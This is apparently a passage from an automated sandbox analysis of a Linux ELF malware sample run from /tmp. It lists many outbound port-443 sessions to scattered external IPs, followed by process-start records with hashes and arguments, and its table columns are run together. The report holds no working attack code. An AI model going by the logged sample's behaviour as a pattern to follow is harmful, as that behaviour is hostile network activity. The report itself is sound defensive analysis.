                                        25473192.168.2.1336140187.145.1.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25474192.168.2.1340218201.225.67.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25475192.168.2.1343410220.188.241.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25476192.168.2.134318246.194.25.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25477192.168.2.1355316222.111.138.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25478192.168.2.135164231.67.87.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25479192.168.2.1333874151.197.237.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25480192.168.2.133397860.153.26.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25481192.168.2.1357330163.207.134.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25482192.168.2.1340352188.45.16.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25483192.168.2.1338076140.237.199.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25484192.168.2.1360818178.207.78.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25485192.168.2.1351806146.135.136.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25486192.168.2.1337504138.73.20.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25487192.168.2.1350128217.60.52.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25488192.168.2.1357904209.199.239.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25489192.168.2.1339578119.132.168.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25490192.168.2.1343630186.200.154.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25491192.168.2.134480464.30.91.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25492192.168.2.134572274.13.109.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25493192.168.2.1350658201.55.137.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25494192.168.2.134298286.71.202.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25495192.168.2.135121431.194.244.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25496192.168.2.1354106104.16.38.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25497192.168.2.1341242217.46.112.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25498192.168.2.1359712191.6.210.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25499192.168.2.1360948170.251.145.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25500192.168.2.133306637.0.32.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25501192.168.2.1346080115.27.105.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25502192.168.2.135942083.106.87.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25503192.168.2.133393236.150.210.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25504192.168.2.134914681.74.103.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25505192.168.2.1347122201.51.193.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25506192.168.2.1346174197.190.0.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25507192.168.2.134077683.249.127.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25508192.168.2.1352934119.30.136.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25509192.168.2.1334300149.105.120.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25510192.168.2.134664870.122.30.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25511192.168.2.1339762122.102.241.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25512192.168.2.13586185.219.128.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25513192.168.2.1335060155.211.24.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25514192.168.2.133850875.4.159.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25515192.168.2.133949445.2.137.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25516192.168.2.1354136187.170.87.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25517192.168.2.1337234191.52.104.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25518192.168.2.1355134117.239.199.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25519192.168.2.135372450.55.125.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25520192.168.2.1337094205.155.227.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25521192.168.2.135206439.42.150.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25522192.168.2.1347846178.208.74.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25523192.168.2.135032235.237.141.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25524192.168.2.135885478.24.8.174443
                                        TimestampBytes transferredDirectionData


                                        System Behavior

                                        Start time (UTC):15:17:59
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:/tmp/yonariVpu7.elf
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:-
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:-
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:-
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:-
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/tmp/yonariVpu7.elf
                                        Arguments:-
                                        File size:4463432 bytes
                                        MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/usr/libexec/gnome-session-binary
                                        Arguments:-
                                        File size:334664 bytes
                                        MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/bin/sh
                                        Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):15:18:00
                                        Start date (UTC):14/01/2024
                                        Path:/usr/libexec/gsd-print-notifications
                                        Arguments:/usr/libexec/gsd-print-notifications
                                        File size:51840 bytes
                                        MD5 hash:71539698aa691718cee775d6b9450ae2

                                        Start time (UTC):15:18:01
                                        Start date (UTC):14/01/2024
                                        Path:/usr/sbin/gdm3
                                        Arguments:-
                                        File size:453296 bytes
                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                        Start time (UTC):15:18:01
                                        Start date (UTC):14/01/2024
                                        Path:/etc/gdm3/PrimeOff/Default
                                        Arguments:/etc/gdm3/PrimeOff/Default
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):15:18:01
                                        Start date (UTC):14/01/2024
                                        Path:/usr/sbin/gdm3
                                        Arguments:-
                                        File size:453296 bytes
                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                        Start time (UTC):15:18:01
                                        Start date (UTC):14/01/2024
                                        Path:/etc/gdm3/PrimeOff/Default
                                        Arguments:/etc/gdm3/PrimeOff/Default
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):15:18:11
                                        Start date (UTC):14/01/2024
                                        Path:/usr/lib/systemd/systemd
                                        Arguments:-
                                        File size:1620224 bytes
                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                        Start time (UTC):15:18:11
                                        Start date (UTC):14/01/2024
                                        Path:/lib/systemd/systemd-user-runtime-dir
                                        Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                        File size:22672 bytes
                                        MD5 hash:d55f4b0847f88131dbcfb07435178e54